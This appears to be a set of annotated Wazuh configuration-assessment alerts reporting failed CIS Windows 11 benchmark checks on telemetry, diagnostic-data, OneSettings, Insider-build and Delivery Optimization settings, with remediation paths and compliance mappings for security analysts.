data.sca.check.result: failed passed, failed or not applicable. failed = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 16 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2527712 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Kind of SCA event: check (one benchmark check's result, as here) or summary (totals for the whole scan).
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26294 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines the amount of diagnostic and usage data reported to Microsoft: - A value of (0) Diagnostic data off (not recommended). Using this value, no diagnostic data is sent from the device. This value is only supported on Enterprise, Education, and Server editions. If you choose this setting, devices in your organization will still be secure. - A value of (1) Send required diagnostic data. This is the minimum diagnostic data necessary to keep Windows secure, up to date, and performing as expected. Using this value disables the Optional diagnostic data control in the Settings app. - A value of (3) Send optional diagnostic data. Additional diagnostic data is collected that helps us to detect, diagnose and fix issues, as well as make product improvements. Required diagnostic data will always be included when you choose to send optional diagnostic data. Optional diagnostic data can also include diagnostic log files and crash dumps. Use the Limit Dump Collection and the Limit Diagnostic Log Collection policies for more granular control of what optional diagnostic data is sent. Windows telemetry settings apply to the Windows operating system and some first party apps. This setting does not apply to third party apps running on Windows 10/11. The recommended state for this setting is: Enabled: Diagnostic data off (not recommended) or Enabled: Send required diagnostic data. Note: If your organization relies on Windows Update, the minimum recommended setting is Required diagnostic data. Because no Windows Update information is collected when diagnostic data is off, important information about update failures is not sent. Microsoft uses this information to fix the causes of those failures and improve the quality of updates. Note #2: The Configure diagnostic data opt-in settings user interface group policy can be used to prevent end users from changing their data collection settings. Note #3: Enhanced diagnostic data setting is not available on Windows 11 and Windows Server 2022 and has been replaced with policies that can control the amount of optional diagnostic data that is sent. For more information on these settings visit Manage diagnostic data using Group Policy and MDM Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Sending any data to a 3rd party vendor is a security concern and should only be done on an as needed basis. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Diagnostic data off (not recommended) or Enabled: Send required diagnostic data: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Allow Diagnostic Data. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 11 Release 21H2 Administrative Templates (or newer). Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Allow Telemetry, but it was renamed to Allow Diagnostic Data starting with the Windows 11 Release 21H2 Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.17.1 CIS benchmark recommendation number – open this section of the benchmark for the audit and remediation detail.
data.sca.check.compliance.pci_dss: 4.1 PCI DSS v3.2.1 requirement the check supports (4.1: protect cardholder data in transit over open, public networks).
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II HIPAA Security Rule technical safeguards mapped (45 CFR §164.312): encryption and decryption (a)(2)(iv) and transmission security (e).
data.sca.check.compliance.nist_800_53: SC.8 NIST SP 800-53 control mapped: SC-8, Transmission Confidentiality and Integrity.
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 SOC 2 Trust Services Criteria mapped: CC6 (logical access controls) and CC7 (system operations and monitoring).
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection'] Registry key the check reads; the value name and expected data come from the SCA policy file. Two allowed values exist here (diagnostic data off, or required only), so the policy rule matches a set rather than one literal.
data.sca.check.result: failed passed, failed or not applicable. failed = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 17 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2535875 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Kind of SCA event: check (one benchmark check's result, as here) or summary (totals for the whole scan).
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26295 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether the Connected User Experience and Telemetry service can automatically use an authenticated proxy to send data back to Microsoft. The recommended state for this setting is: Enabled: Disable Authenticated Proxy usage. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Sending any data to a 3rd party vendor is a security concern and should only be done on an as needed basis. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Disable Authenticated Proxy usage: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 1703 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.17.2 CIS benchmark recommendation number inside the policy named in data.sca.policy – open that section of the benchmark for the full audit and remediation text.
data.sca.check.compliance.pci_dss: 4.1 PCI DSS requirement mapping (4.1 – protect cardholder data sent over open, public networks).
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II HIPAA Security Rule technical safeguards (§164.312 encryption and transmission-security controls).
data.sca.check.compliance.nist_800_53: SC.8 NIST SP 800-53 control mapping (SC-8 – Transmission Confidentiality and Integrity).
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 SOC 2 Trust Services Criteria mapping (logical access, restrictions on information movement, monitoring).
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection'] Registry key(s) the check read. The policy value lives under this key; if the key is absent the Group Policy was never applied and the OS default is in effect.
data.sca.check.result: failed passed, failed or not applicable. failed needs fixing; not applicable (see data.sca.check.reason when present) means the object could not be evaluated, which is not the same as passing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disable OneSettings Downloads' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 18 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.17.3'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2539776 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check SCA event type – check (one benchmark check) or summary (totals for the run). Not the scan engine; see data.sca.check.* for what was inspected.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26296 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Disable OneSettings Downloads' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether Windows attempts to connect with the OneSettings service to download configuration settings. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Sending data to a 3rd party vendor is a security concern and should only be done on an as-needed basis. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Disable OneSettings Downloads. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.17.3 CIS benchmark recommendation number inside data.sca.policy – open that section for the full audit and remediation text.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection'] Registry key(s) the check read; if the key is absent the policy was never applied and the OS default is in effect.
data.sca.check.result: failed passed, failed or not applicable. failed needs fixing; not applicable is not a pass.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not show feedback notifications' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 19 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2542714 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check SCA event type – check (one benchmark check) or summary (totals for the run). Not the scan engine; see data.sca.check.* for what was inspected.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26297 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Do not show feedback notifications' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows an organization to prevent its devices from showing feedback questions from Microsoft. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Users should not be sending any feedback to 3rd party vendors in an enterprise managed environment. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Do not show feedback notifications. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template FeedbackNotifications.admx/adml that is included with the Microsoft Windows 10 Release 1511 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.17.4 CIS benchmark recommendation number inside data.sca.policy – open that section for the full audit and remediation text.
data.sca.check.compliance.pci_dss: 4.1 PCI DSS requirement mapping (4.1 – protect cardholder data sent over open, public networks).
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II HIPAA Security Rule technical safeguards (§164.312 encryption and transmission-security controls).
data.sca.check.compliance.nist_800_53: SC.8 NIST SP 800-53 control mapping (SC-8 – Transmission Confidentiality and Integrity).
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 SOC 2 Trust Services Criteria mapping (logical access, restrictions on information movement, monitoring).
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection'] Registry key(s) the check read; if the key is absent the policy was never applied and the OS default is in effect.
data.sca.check.result: failed passed, failed or not applicable. failed needs fixing; not applicable is not a pass.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable OneSettings Auditing' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 20 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.17.5'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] CIS Critical Security Controls v8 safeguard mapping (8.5 – Collect Detailed Audit Logs).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2545987 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check SCA event type – check (one benchmark check) or summary (totals for the run). Not the scan engine; see data.sca.check.* for what was inspected.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26298 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Enable OneSettings Auditing' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether Windows records attempts to connect with the OneSettings service to the Operational EventLog. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Enable OneSettings Auditing. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.17.5 CIS benchmark recommendation number inside data.sca.policy – open that section for the full audit and remediation text.
data.sca.check.compliance.cis_csc: 8.5 CIS Critical Security Controls v8 safeguard mapping (8.5 – Collect Detailed Audit Logs).
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection'] Registry key(s) the check read; if the key is absent the policy was never applied and the OS default is in effect.
data.sca.check.result: failed passed, failed or not applicable. failed needs fixing; not applicable is not a pass.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Limit Diagnostic Log Collection' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 21 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.17.6'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2549073 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check SCA event type – check (one benchmark check) or summary (totals for the run). Not the scan engine; see data.sca.check.* for what was inspected.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26299 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Limit Diagnostic Log Collection' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether additional diagnostic logs are collected when more information is needed to troubleshoot a problem on the device. The recommended state for this setting is: Enabled. Note: Diagnostic logs are only sent when the device has been configured to send optional diagnostic data. Diagnostic data is limited with recommendation Allow Diagnostic Data is set to Enabled: Diagnostic data off (not recommended) or Enabled: Send required diagnostic data to send only basic information. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Sending data to a 3rd-party vendor is a security concern and should only be done on an as-needed basis. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Limit Diagnostic Log Collection. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.17.6 CIS benchmark recommendation number inside data.sca.policy – open that section for the full audit and remediation text.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection'] Registry key(s) the check read; if the key is absent the policy was never applied and the OS default is in effect.
data.sca.check.result: failed passed, failed or not applicable. failed needs fixing; not applicable is not a pass.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Toggle user control over Insider builds' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 22 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2552677 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check SCA event type – check (one benchmark check) or summary (totals for the run). Not the scan engine; see data.sca.check.* for what was inspected.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26301 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Toggle user control over Insider builds' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines whether users can access the Insider build controls in the Advanced Options for Windows Update. These controls are located under "Get Insider builds," and enable users to make their devices available for downloading and installing Windows preview software. The recommended state for this setting is: Disabled. Note: This policy setting applies only to devices running Windows 10 Pro or Windows 10 Enterprise, up until Release 1703. For Release 1709 or newer, Microsoft encourages using the Manage preview builds setting (recommendation title ‘Manage preview builds’). We have kept this setting in the benchmark to ensure that any older builds of Windows 10 in the environment are still enforced. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: It can be risky for experimental features to be allowed in an enterprise managed environment because this can introduce bugs and security holes into systems, making it easier for an attacker to gain access. It is generally preferred to only use production-ready builds. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Toggle user control over Insider builds. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template AllowBuildPreview.admx/adml that is included with the Microsoft Windows 10 RTM (Release 1507) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.17.8 CIS benchmark recommendation number inside data.sca.policy – open that section for the full audit and remediation text.
data.sca.check.compliance.cis_csc: 2.5 CIS Critical Security Controls v8 safeguard mapping (2.5 – Allowlist Authorized Software).
data.sca.check.compliance.pci_dss: 4.1 PCI DSS requirement mapping (4.1 – protect cardholder data sent over open, public networks).
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II HIPAA Security Rule technical safeguards (§164.312 encryption and transmission-security controls).
data.sca.check.compliance.nist_800_53: SC.8 NIST SP 800-53 control mapping (SC-8 – Transmission Confidentiality and Integrity).
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 SOC 2 Trust Services Criteria mapping (logical access, restrictions on information movement, monitoring).
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\PreviewBuilds'] Registry key(s) the check read; if the key is absent the policy was never applied and the OS default is in effect.
data.sca.check.result: failed passed, failed or not applicable. failed needs fixing; not applicable is not a pass.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Download Mode' is NOT set to 'Enabled: Internet'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19009 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '6.2'] PCI DSS mapping – card‑holder data rules.
rule.cis: ['18.9.18.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['7.3'] CIS Critical Security Controls v8 safeguard mapping (7.3 – Perform Automated Operating System Patch Management).
rule.gpg_13: ['4.3'] UK NCSC Good Practice Guide 13 (Protective Monitoring) control mapping. Spelled gpg13 on some rules; same mapping.
rule.gdpr_IV: ['35.7.d'] GDPR Chapter IV mapping (Art. 35(7)(d) – DPIA measures to address the identified risks); the same mapping as rule.gdpr in a second notation.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2557475 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check SCA event type – check (one benchmark check) or summary (totals for the run). Not the scan engine; see data.sca.check.* for what was inspected.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26302 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Download Mode' is NOT set to 'Enabled: Internet'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting specifies the download method that Delivery Optimization can use in downloads of Windows Updates, Apps and App updates. The following methods are supported: - 0 = HTTP only, no peering. - 1 = HTTP blended with peering behind the same NAT. - 2 = HTTP blended with peering across a private group. Peering occurs on devices in the same Active Directory Site (if exist) or the same domain by default. When this option is selected, peering will cross NATs. To create a custom group use Group ID in combination with Mode 2. - 3 = HTTP blended with Internet Peering. - 99 = Simple download mode with no peering. Delivery Optimization downloads using HTTP only and does not attempt to contact the Delivery Optimization cloud services. - 100 = Bypass mode. Do not use Delivery Optimization and use BITS instead. The recommended state for this setting is any value EXCEPT: Enabled: Internet (3). Note: The default on all SKUs other than Enterprise, Enterprise LTSB or Education is Enabled: Internet (3), so on other SKUs, be sure to set this to a different value. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Due to privacy concerns and security risks, updates should only be downloaded directly from Microsoft, or from a trusted machine on the internal network that received its updates from a trusted source and approved by the network administrator. Why this matters (compliance / security impact).
